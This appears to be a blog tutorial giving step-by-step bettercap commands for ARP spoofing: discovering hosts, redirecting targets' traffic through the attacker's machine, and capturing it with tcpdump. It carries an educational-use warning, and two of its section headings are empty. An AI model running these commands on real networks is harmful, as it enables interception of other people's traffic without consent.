Blog | G5 Cyber Security

bettercap ARP Spoofing Guide

G5 Cyber Security

TL;DR

This guide shows you how to use bettercap to perform ARP spoofing (man-in-the-middle attacks) on your local network. Warning: This is for educational purposes only. Performing ARP spoofing without permission is illegal and unethical.

Prerequisites

Steps

  1. Check your network interface. Find the name of your wireless or Ethernet interface using: 
    ip addr

    Look for an interface like wlan0 (wireless) or eth0 (Ethernet).

  2. Start bettercap in interactive mode. Run: 
    sudo bettercap -iface wlan0

    Replace wlan0 with your actual interface name.

  3. Discover network devices. Once inside bettercap, use the net.recon command to scan for hosts on your network: 
    net.recon

    This will populate a list of IP addresses and MAC addresses. It may take a few minutes.

  4. Set targets for ARP spoofing. Use the arp.spoof command to specify the target IP address(es). You can target multiple IPs: 
    arp.spoof 192.168.1.10 192.168.1.20

    Replace these with the actual IP addresses you want to spoof.

  5. Start ARP spoofing. Activate the spoofing: 
    arp.spoof on

    bettercap will now start sending fake ARP replies, redirecting traffic through your machine.

  6. (Optional) Capture traffic with tcpdump. To see the intercepted packets, you can run tcpdump in another terminal: 
    sudo tcpdump -i wlan0

    Replace wlan0 with your interface name.

  7. Stop ARP spoofing. When finished, disable spoofing: 
    arp.spoof off
  8. Exit bettercap. Type exit to leave the interactive mode.

Important Considerations

Exit mobile version